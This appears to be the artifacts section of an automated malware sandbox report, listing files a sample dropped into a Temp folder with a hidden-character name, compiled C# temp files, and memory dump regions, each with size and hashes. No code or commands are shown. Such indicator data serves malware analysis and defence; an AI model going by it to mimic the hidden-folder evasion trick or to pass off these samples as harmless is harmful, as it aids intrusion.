869b9d68376162577da9bb5fa812d9b9b397293a9cc795c5dd385c7c091392ed4d6b93e35ba0d0d853169ee1dfefe33b68e10d80eceee788c2d0e91df35dfabd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Documents\CompleteStop.xlsx

Filesize
13KB

MD5
f37c65b3464a2a9ad19244d415ad0b7c

SHA1
d7c990f13115268305f28748e41dad08fb042828

SHA256
d709f00c83324be1567a593cacaab0119d64e4676e992a2dcfa4109d889146fb

SHA512
3a9e44eb93f9d9fe26a3403945b048910ea2292ef47ee7bbe93d7f531e539f44b31d5f5b98b81f2035ef905a96ce6a6887b05425e1fb46bae606e6256325799d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Documents\RemoveGrant.docx

Filesize
885KB

MD5
f25cb1e47062bad026018ca84524d4e4

SHA1
366eb89a844156ca8113f6cc3cb8ba420c17a09a

SHA256
bd26b4e80d576ceb69b3a9fa0a2aa2024e0fd8007f21e5a81b0ba6ab1a81aa5c

SHA512
62ef8e49da0b8b96063e77817490d444e3463e4ab9fe39fdceb871265c2de893566a59a470eeb6435d8907edbfc91eedff5c98eb7914d81f288768618755ee18

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Documents\TestHide.xlsx

Filesize
11KB

MD5
07b0be77f478f91a6a7d67611f43aa23

SHA1
014dc115ac0535b7e7af83b5644a55f4fa8ae7e5

SHA256
79ba9ad39487e663c2a5cfd63ef9ca282ed5c24abeca676dd948e2383ab4ea29

SHA512
e657eabbb08173cd10533502fb2527c9ed1f1277896d8a824ab4d07053ef7e2e9924d8d9771da7c37c6e17fc2b1c4ca281d6277385e5720a394bd346d5ce88e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Downloads\CheckpointWrite.mp3

Filesize
850KB

MD5
9d1f436c583908b25fba879ccd8ea2af

SHA1
dc2ec7f0eab4805931df93981b0d55f0682c1ac4

SHA256
2469e6406bb136f3a257134f9c02f573771845a283b874e642475dbbb9fbe8b4

SHA512
0a0ccb6927cc15889d328903d4c833645c79a4347f5dd2275e4554405c6af065220ca180ab08ec04fb2ec9df078e6177bda2530346e7dcb2d1711ceeba706f52

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Downloads\DismountConfirm.doc

Filesize
549KB

MD5
658a64360858272dff76da4359404e34

SHA1
cc4321b08cff06e986373b2e506922ab401c2a97

SHA256
510ba867d9540432df276178247979576d645499cf62b3b85170adbf8021c221

SHA512
e6fb6f826107c6062127f93746ab0b9c93c43e75418a84b270e0f72f91f27a563ece41aac5f2afca361c25a4360d09700457c247a2c348ad769723e57c246e73

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Downloads\EnableBackup.mpeg

Filesize
354KB

MD5
439a35afefea5ed16d09cbedd540ac87

SHA1
9d739c62a32d27821681c0643ef2d428a2e2db4e

SHA256
c712969933e0a4a53c1d3663196179e26f30049d2a055aa57e1cfdc95e1b5edb

SHA512
cdc04340573b1df06c19ccd9c06fcee7f0bef61abd9692ff22d8e08c32917724f6c38a638a7e853866e2f10b275d90480c01bdaa94eebfcddcfbc6a69909a6dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Downloads\RevokeJoin.mp3

Filesize
620KB

MD5
d3f7f06c954dbd8c1b2b2e8e99ee956f

SHA1
3dd8486c649f6e8048704ad286780c6ef7154cf4

SHA256
486f94a5e23db4b4483d12f665fa3b91328122b16a1fab56ddb60efa02542bb6

SHA512
d355782147bbefeaa2cbf25ddaa6cc1352895cc8ceb600c156b1b8ff37af0c1271825cf3d3ccf9fa4e6ff34a781505e5bebb5c678a4578d0d24133e489b498e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Downloads\UnlockResume.jpg

Filesize
372KB

MD5
fbda25c73bfdb3d143a5a50161b4bd1e

SHA1
112f99610107ac68b1af65a73afce059dff237e6

SHA256
245aab1f1b7e1363ffea83561bc6a6922bf5dac47c1512b2d8e5fa891c51cf7a

SHA512
51b9cc56d94e73232d12c7a0a9b960388e8bfd143ecc9ddb017db98862e74cfc46d00fd5351295007d473ba9a63f53347e4dd985afe02974c090ee2cfbeea952

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ \Common Files\Downloads\UnpublishConvertFrom.jpeg

Filesize
815KB

MD5
f4ba4e9395c07143d0340d483fec0238

SHA1
d5fce89b0f9f24b2c6a62a2549d99eddb3ef65fe

SHA256
e933d6b1ed75a70203edff633a90878aad5f2afd3b12c7cb8e20fba01debc616

SHA512
c3d9c57cda88e99999692c1e33d6f9156084ef881e0cf61194cf0b82fbb5905b875d65e3174df3d37186fdacb6b02af78ddb643c044b64ef254e3eb2ab0413ff

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\oeb22303\CSC44121B06219C428F8E73B629F48E1D23.TMP

Filesize
652B

MD5
4ec6c908f3326b604c62e61c9b5f93cc

SHA1
84eac24640514b55e752569361b26a3a3b78d774

SHA256
d182b99ab575dab65beeea9dadb6aeea28c7838b4b6ac5b94929f376c3718f38

SHA512
05e01a017157baf4ee70547e0d3ac1add8f6bc8986994cdcf239863f814feafa891e7d1234c3eec43ebbcd0af3b1b542e70660dbc5216a6dce55482487b998dd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\oeb22303\oeb22303.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\oeb22303\oeb22303.cmdline

Filesize
607B

MD5
a03c1e29a56ed9c4b9e71a5a403ba166

SHA1
b975aec636b5068ee74be06ce88337862674ac25

SHA256
9716b3ab844d8b2259f5a6e12f4f1638be9b5ad45effa9f984a3a5dfcc919bec

SHA512
6eaa11ed6662eec97476f536ade21d248619e0653e6137cc887d66c6ca80de890f32cf2c3a75015ae32ffc54ed71e2ac226dc67aa0db4acf19c8eabd5f102cdb

Download Submit
memory/744-91-0x0000029227420000-0x0000029227442000-memory.dmp

Filesize
136KB

Download
memory/2636-221-0x000001FBDB980000-0x000001FBDB988000-memory.dmp

Filesize
32KB

Download
memory/2732-30-0x00007FFD09750000-0x00007FFD09777000-memory.dmp

Filesize
156KB

Download
memory/2732-54-0x00007FFD08960000-0x00007FFD0898C000-memory.dmp

Filesize
176KB

Download
memory/2732-32-0x00007FFD12E50000-0x00007FFD12E5F000-memory.dmp

Filesize
60KB

Download
memory/2732-85-0x00007FFCFC170000-0x00007FFCFC223000-memory.dmp

Filesize
716KB

Download
memory/2732-84-0x00007FFD12DF0000-0x00007FFD12E09000-memory.dmp

Filesize
100KB

Download
memory/2732-79-0x00007FFD0D2F0000-0x00007FFD0D2FD000-memory.dmp

Filesize
52KB

Download
memory/2732-78-0x00007FFD08960000-0x00007FFD0898C000-memory.dmp

Filesize
176KB

Download
memory/2732-230-0x00007FFCF9BF0000-0x00007FFCF9D6F000-memory.dmp

Filesize
1.5MB

Download
memory/2732-25-0x00007FFCF6EC0000-0x00007FFCF7522000-memory.dmp

Filesize
6.4MB

Download
memory/2732-76-0x00007FFD0F9B0000-0x00007FFD0F9C4000-memory.dmp

Filesize
80KB

Download
memory/2732-70-0x00007FFCF6EC0000-0x00007FFCF7522000-memory.dmp

Filesize
6.4MB

Download
memory/2732-73-0x00007FFCF6540000-0x00007FFCF6A73000-memory.dmp

Filesize
5.2MB

Download
memory/2732-74-0x00007FFD09750000-0x00007FFD09777000-memory.dmp

Filesize
156KB

Download
memory/2732-72-0x000001D1F6250000-0x000001D1F6783000-memory.dmp

Filesize
5.2MB

Download
memory/2732-71-0x00007FFD08720000-0x00007FFD087EE000-memory.dmp

Filesize
824KB

Download
memory/2732-66-0x00007FFD08870000-0x00007FFD088A4000-memory.dmp

Filesize
208KB

Download
memory/2732-64-0x00007FFD12560000-0x00007FFD1256D000-memory.dmp

Filesize
52KB

Download
memory/2732-62-0x00007FFD0F9E0000-0x00007FFD0F9F9000-memory.dmp

Filesize
100KB

Download
memory/2732-60-0x00007FFCF9BF0000-0x00007FFCF9D6F000-memory.dmp

Filesize
1.5MB

Download
memory/2732-58-0x00007FFD08930000-0x00007FFD08955000-memory.dmp

Filesize
148KB

Download
memory/2732-56-0x00007FFD12DF0000-0x00007FFD12E09000-memory.dmp

Filesize
100KB

Download
memory/2732-183-0x00007FFD08930000-0x00007FFD08955000-memory.dmp

Filesize
148KB

Download
memory/2732-310-0x00007FFD08870000-0x00007FFD088A4000-memory.dmp

Filesize
208KB

Download
memory/2732-311-0x00007FFD08720000-0x00007FFD087EE000-memory.dmp

Filesize
824KB

Download
memory/2732-312-0x000001D1F6250000-0x000001D1F6783000-memory.dmp

Filesize
5.2MB

Download
memory/2732-331-0x00007FFCF6540000-0x00007FFCF6A73000-memory.dmp

Filesize
5.2MB

Download
memory/2732-338-0x00007FFCF9BF0000-0x00007FFCF9D6F000-memory.dmp

Filesize
1.5MB

Download
memory/2732-332-0x00007FFCF6EC0000-0x00007FFCF7522000-memory.dmp

Filesize
6.4MB

Download
memory/2732-347-0x00007FFCF6EC0000-0x00007FFCF7522000-memory.dmp

Filesize
6.4MB

Download
memory/2732-367-0x00007FFD08930000-0x00007FFD08955000-memory.dmp

Filesize
148KB

Download
memory/2732-372-0x00007FFD08720000-0x00007FFD087EE000-memory.dmp

Filesize
824KB

Download
memory/2732-371-0x00007FFD08870000-0x00007FFD088A4000-memory.dmp

Filesize
208KB

Download
memory/2732-370-0x00007FFD12560000-0x00007FFD1256D000-memory.dmp

Filesize
52KB

Download
memory/2732-369-0x00007FFD0F9E0000-0x00007FFD0F9F9000-memory.dmp

Filesize
100KB

Download
memory/2732-368-0x00007FFCF9BF0000-0x00007FFCF9D6F000-memory.dmp

Filesize
1.5MB

Download
memory/2732-366-0x00007FFD12DF0000-0x00007FFD12E09000-memory.dmp

Filesize
100KB

Download
memory/2732-365-0x00007FFD08960000-0x00007FFD0898C000-memory.dmp

Filesize
176KB

Download
memory/2732-364-0x00007FFD12E50000-0x00007FFD12E5F000-memory.dmp

Filesize
60KB

Download
memory/2732-363-0x00007FFD09750000-0x00007FFD09777000-memory.dmp

Filesize
156KB

Download
memory/2732-362-0x00007FFCF6540000-0x00007FFCF6A73000-memory.dmp

Filesize
5.2MB

Download
memory/2732-361-0x00007FFCFC170000-0x00007FFCFC223000-memory.dmp

Filesize
716KB

Download
memory/2732-360-0x00007FFD0D2F0000-0x00007FFD0D2FD000-memory.dmp

Filesize
52KB

Download
memory/2732-359-0x00007FFD0F9B0000-0x00007FFD0F9C4000-memory.dmp

Filesize
80KB

Download